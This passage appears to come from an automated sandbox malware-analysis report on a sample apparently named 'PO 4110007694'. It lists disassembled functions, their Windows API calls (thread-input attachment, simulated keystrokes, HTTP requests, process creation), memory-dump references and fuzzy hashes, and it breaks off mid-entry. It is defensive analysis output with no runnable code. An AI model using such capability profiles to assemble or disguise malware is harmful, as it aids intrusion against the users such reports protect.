                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C71204
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00C7120B
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C7121A
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7122C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C71245
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C70268,?,00000001), ref: 00C71257
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C7129C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C712B1
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00C70268,?,00000001), ref: 00C712BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: 3b4664c538a4440f9f3dd0066c7cf847456dbc6f6bb05917dd7d503946f3c93c
                                                                    • Instruction ID: cf1ff42b42688a4692964afbb4dc8ee27f12f0de0a8c99ae2035dc3a322c3a68
                                                                    • Opcode Fuzzy Hash: 3b4664c538a4440f9f3dd0066c7cf847456dbc6f6bb05917dd7d503946f3c93c
                                                                    • Instruction Fuzzy Hash: BD319E75601704FBDB209F98EC88F6D77A9EB54311F24812AFD18D61A1E7B49E40CB60
                                                                    Function 00C1FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C1FAA6
                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00C1FB45
                                                                    • UnregisterHotKey.USER32(?), ref: 00C1FC9C
                                                                    • DestroyWindow.USER32(?), ref: 00C545D6
                                                                    • FreeLibrary.KERNEL32(?), ref: 00C5463B
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C54668
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: a1960890d29719f0a6afb1e89efae3626d9cfbbfd82b43762f609bb341adeab7
                                                                    • Instruction ID: 45110a2b7c8692468f1c28fbcda1786fb4886a03dcdda065ea19dba5093483b7
                                                                    • Opcode Fuzzy Hash: a1960890d29719f0a6afb1e89efae3626d9cfbbfd82b43762f609bb341adeab7
                                                                    • Instruction Fuzzy Hash: 0DA17034301212CFCB29EF14C5A4BA9F364AF06705F5442ADE80AAB251DB30ED97EF94
                                                                    Function 00C6A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,00C6A439), ref: 00C6A377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 3555792229-1603158881
                                                                    • Opcode ID: 1abcd7ebf48c09b8f299453e7bb5fcd22a6a1c91246dbbda258604561e0eba1a
                                                                    • Instruction ID: 69f00f6b6ec0e988dca48dd48757d39e91680ddf1820f979eeff3de127cffd09
                                                                    • Opcode Fuzzy Hash: 1abcd7ebf48c09b8f299453e7bb5fcd22a6a1c91246dbbda258604561e0eba1a
                                                                    • Instruction Fuzzy Hash: FF91A571604605EACB18DFA0C492BEDFBB4FF05300F548129E85AB7251DF31AA99EF91
                                                                    Function 00C12E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00C12EAE
                                                                      • Part of subcall function 00C11DB3: GetClientRect.USER32(?,?), ref: 00C11DDC
                                                                      • Part of subcall function 00C11DB3: GetWindowRect.USER32(?,?), ref: 00C11E1D
                                                                      • Part of subcall function 00C11DB3: ScreenToClient.USER32(?,?), ref: 00C11E45
                                                                    • GetDC.USER32 ref: 00C4CD32
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00C4CD45
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00C4CD53
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00C4CD68
                                                                    • ReleaseDC.USER32(?,00000000), ref: 00C4CD70
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00C4CDFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: 1ff678b5cd4978a0e80e5d5a186e35560e71f9dfb276bfce5f7620c6263d2f19
                                                                    • Instruction ID: b75d486d1f4763d1b9b9a19bc50e484b6d9ecd2061d27ee0c688b565afaea80e
                                                                    • Opcode Fuzzy Hash: 1ff678b5cd4978a0e80e5d5a186e35560e71f9dfb276bfce5f7620c6263d2f19
                                                                    • Instruction Fuzzy Hash: D771DC35901209DFCF618F64C8C4AFA3BB5FF49321F14427AED659A2B6C7318991EB60
                                                                    Function 00C81A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C81A50
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C81A7C
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C81ABE
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C81AD3
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C81AE0
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C81B10
                                                                    • InternetCloseHandle.WININET(00000000), ref: 00C81B57
                                                                      • Part of subcall function 00C82483: GetLastError.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C82498
                                                                      • Part of subcall function 00C82483: SetEvent.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C824AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                    • String ID:
                                                                    • API String ID: 2603140658-3916222277
                                                                    • Opcode ID: 964d9b7ee597bc0a8b6ebda61a959bd47a6ececb5a463529ce1825ee1fa48d52
                                                                    • Instruction ID: 179d34ecd63109467328b0f88275207c5798fadfadbe8bf6436909d2546c89ce
                                                                    • Opcode Fuzzy Hash: 964d9b7ee597bc0a8b6ebda61a959bd47a6ececb5a463529ce1825ee1fa48d52
                                                                    • Instruction Fuzzy Hash: C9414CB1501218BFEB15AF51CC89FFF7BACEB08358F04412AFD159A141E7709E469BA8
                                                                    Function 00C88C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C9F910), ref: 00C88D28
                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C9F910), ref: 00C88D5C
                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C88ED6
                                                                    • SysFreeString.OLEAUT32(?), ref: 00C88F00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                    • String ID:
                                                                    • API String ID: 560350794-0
                                                                    • Opcode ID: 5bb36202bb4ce0702141d4966ca857937a625c7ff16e7bb3a8de8d51225810b7
                                                                    • Instruction ID: 56d659fd501a70e7f07a78a61ad3d5e333917f8c48def7d2c73951c566f49e5f
                                                                    • Opcode Fuzzy Hash: 5bb36202bb4ce0702141d4966ca857937a625c7ff16e7bb3a8de8d51225810b7
                                                                    • Instruction Fuzzy Hash: 4CF15B71A00209EFCF14EF94C888EAEB7B9FF49318F148458F915AB251DB31AE46DB54
                                                                    Function 00C8F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C8F6B5
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F848
                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F86C
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F8AC
                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C8F8CE
                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C8FA4A
                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C8FA7C
                                                                    • CloseHandle.KERNEL32(?), ref: 00C8FAAB
                                                                    • CloseHandle.KERNEL32(?), ref: 00C8FB22
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                    • String ID:
                                                                    • API String ID: 4090791747-0
                                                                    • Opcode ID: 3dd890b467fd0a44818053eb178a3c4bc62d288958dd45332639242ec46f661f
                                                                    • Instruction ID: 5bdf312a89191673b26e1b3495d4326cea6d1d3d82b47a64d03290515fe5a470
                                                                    • Opcode Fuzzy Hash: 3dd890b467fd0a44818053eb178a3c4bc62d288958dd45332639242ec46f661f
                                                                    • Instruction Fuzzy Hash: 52E1A1316043009FDB14EF24C891B6EBBE1EF85318F14856DF8999B2A2CB31DD46EB56
                                                                    Function 00C74CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C73697,?), ref: 00C7468B
                                                                      • Part of subcall function 00C7466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C73697,?), ref: 00C746A4
                                                                      • Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32
                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00C74D40
                                                                    • _wcscmp.LIBCMT ref: 00C74D5A
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00C74D75
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 793581249-0
                                                                    • Opcode ID: 391aff3c73a9ade27ec92984c67aed06dd3f908af0e9982db7912447975ca680
                                                                    • Instruction ID: a920c7d70c417c241e3ebb956274dfb9d747d9332de474b482d90dc8a63a34d9
                                                                    • Opcode Fuzzy Hash: 391aff3c73a9ade27ec92984c67aed06dd3f908af0e9982db7912447975ca680
                                                                    • Instruction Fuzzy Hash: FD5151B20083859BC724EBA0D8819DFB3ECAF85350F00492EF699D3151EF75E689D766
                                                                    Function 00C98645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C986FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InvalidateRect
                                                                    • String ID:
                                                                    • API String ID: 634782764-0
                                                                    • Opcode ID: 007f31fb8ba62c74c5a493708a88bb613c7c4172a780238a7fe6aeb8180d3b13
                                                                    • Instruction ID: a22b11572af4400c54b53032f060f357014da11fe0f95dd9ca5330b92f49fb1c
                                                                    • Opcode Fuzzy Hash: 007f31fb8ba62c74c5a493708a88bb613c7c4172a780238a7fe6aeb8180d3b13
                                                                    • Instruction Fuzzy Hash: 96518130500244FEDF209B65CC8DFAD7BA5AB06760F604116FA61EB1E1CF71EA98DB54
                                                                    Function 00C12B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C4C2F7
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C4C319
                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C4C331
                                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C4C34F
                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C4C370
                                                                    • DestroyIcon.USER32(00000000), ref: 00C4C37F
                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C4C39C
                                                                    • DestroyIcon.USER32(?), ref: 00C4C3AB
                                                                      • Part of subcall function 00C9A4AF: DeleteObject.GDI32(00000000), ref: 00C9A4E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                    • String ID:
                                                                    • API String ID: 2819616528-0
                                                                    • Opcode ID: fa38725d135644b32638bab3004453bed50022d10a0b8b7090f2b67f1ac63fa5
                                                                    • Instruction ID: 63a5edead006c99a48be93fd3a4e8435794c35f2c990d039f8177e1b35e2954e
                                                                    • Opcode Fuzzy Hash: fa38725d135644b32638bab3004453bed50022d10a0b8b7090f2b67f1ac63fa5
                                                                    • Instruction Fuzzy Hash: 42516774A00209AFDB24DF65CC85FAE7BA5FB19310F104529F912D72A0D7B0EDA1EB90
                                                                    Function 00C6966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C6A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C6A84C
                                                                      • Part of subcall function 00C6A82C: GetCurrentThreadId.KERNEL32 ref: 00C6A853
                                                                      • Part of subcall function 00C6A82C: AttachThreadInput.USER32(00000000,?,00C69683,?,00000001), ref: 00C6A85A
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C6968E
                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C696AB
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C696AE
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C696B7
                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C696D5
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C696D8
                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C696E1
                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C696F8
                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C696FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                    • String ID:
                                                                    • API String ID: 2014098862-0
                                                                    • Opcode ID: 3c37a90a801ca24ccc9d0dd4f45b8b4fd2e92584057790fbccc3d1588c588746
                                                                    • Instruction ID: f720ba76d77f656217f760b63142db45f969a56ec34eee8ef064b659c168c6d3
                                                                    • Opcode Fuzzy Hash: 3c37a90a801ca24ccc9d0dd4f45b8b4fd2e92584057790fbccc3d1588c588746
                                                                    • Instruction Fuzzy Hash: 57118EB1950618BEF6206B61DC8DF6E7A2DEB4C751F11042AF244AB0A1C9F26C529AE4
                                                                    Function 00C68921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C6853C,00000B00,?,?), ref: 00C6892A
                                                                    • HeapAlloc.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C68931
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C6853C,00000B00,?,?), ref: 00C68946
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00C6853C,00000B00,?,?), ref: 00C6894E
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C68951
                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C6853C,00000B00,?,?), ref: 00C68961
                                                                    • GetCurrentProcess.KERNEL32(00C6853C,00000000,?,00C6853C,00000B00,?,?), ref: 00C68969
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00C6853C,00000B00,?,?), ref: 00C6896C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00C68992,00000000,00000000,00000000), ref: 00C68986
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                    • String ID:
                                                                    • API String ID: 1957940570-0
                                                                    • Opcode ID: 906172d873b52033a0d703181485756b337e7ca51818cad5315ac70d945d62ac
                                                                    • Instruction ID: 6830be31c0d04a1e5f4f698ca0d5a44eae29cc5416253e662bdca98f6120db82
                                                                    • Opcode Fuzzy Hash: 906172d873b52033a0d703181485756b337e7ca51818cad5315ac70d945d62ac
                                                                    • Instruction Fuzzy Hash: 9701BBB5240308FFEB10ABA5DC4DF6F3BACEB89711F508426FA05DB1A1CA709801CB64
                                                                    Function 00C89B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 0-572801152
                                                                    • Opcode ID: d1015df09f1f703c2f44eb253d8d0bfec72186ac1bb1dbe9695f0714171cd6f9
                                                                    • Instruction ID: 4def5d12bc6b349c5e5a78e9411fb5f4655c250803dd4f096d86307f2a999d3e
                                                                    • Opcode Fuzzy Hash: d1015df09f1f703c2f44eb253d8d0bfec72186ac1bb1dbe9695f0714171cd6f9
                                                                    • Instruction Fuzzy Hash: 55C1A371A002199FDF10EF98D884BBEB7F5FB48318F188469E915E7280E771AE45CB94
                                                                    Function 00C89113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
